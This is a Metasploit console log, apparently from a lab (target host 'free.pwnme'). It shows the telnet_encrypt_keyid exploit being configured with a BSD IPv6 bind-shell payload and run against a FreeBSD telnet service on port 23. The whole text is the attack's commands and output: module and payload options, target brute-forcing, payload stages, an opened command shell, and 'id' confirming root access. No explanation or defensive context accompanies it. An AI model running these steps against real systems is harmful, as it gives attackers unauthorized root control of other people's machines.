10.8.28.2 - (Sessions: 0 Jobs: 0) exploit(telnet_encrypt_keyid) > set PAYLOAD bsd/x86/shell/bind_ipv6_tcp
PAYLOAD => bsd/x86/shell/bind_ipv6_tcp
10.8.28.2 - (Sessions: 0 Jobs: 0) exploit(telnet_encrypt_keyid) > show options

Module options (exploit/freebsd/telnet/telnet_encrypt_keyid):

   Name      Current Setting           Required  Description
   ----      ---------------           --------  -----------
   PASSWORD                            no        The password
   RHOST     fe80::20c:29ff:fe4c:2f4d  yes       The target address
   RPORT     23                        yes       The target port
   USERNAME                            no        The username to authenticate

Payload options (bsd/x86/shell/bind_ipv6_tcp):

   Name   Current Setting           Required  Description
   ----   ---------------           --------  -----------
   LPORT  4444                      yes       The listen port
   RHOST  fe80::20c:29ff:fe4c:2f4d  no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic

10.8.28.2 - (Sessions: 0 Jobs: 0) exploit(telnet_encrypt_keyid) > exploit

[*] [2012.02.03-16:29:56] Started bind handler
[*] [2012.02.03-16:29:56] Brute forcing with 9 possible targets
[*] [2012.02.03-16:29:56] Trying target FreeBSD 8.2...
[*] [2012.02.03-16:29:56] FreeBSD/i386 (free.pwnme) (ttyp0)\x0d\x0a\x0d\x0alogin:
[...]
[*] [2012.02.03-16:30:00] Sending first payload
[*] [2012.02.03-16:30:01] Sending second payload...
[*] [2012.02.03-16:30:01] Sending stage (46 bytes) to fe80::20c:29ff:fe4c:2f4d
[*] [2012.02.03-16:30:01] Trying target FreeBSD 7.0/7.1/7.2...
[*] Command shell session 1 opened (fe80::20c:29ff:fecf:6aba%eth0:45801 -> fe80::20c:29ff:fe4c:2f4d%eth0:4444) at 2012-02-03 16:30:02 +0100

id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)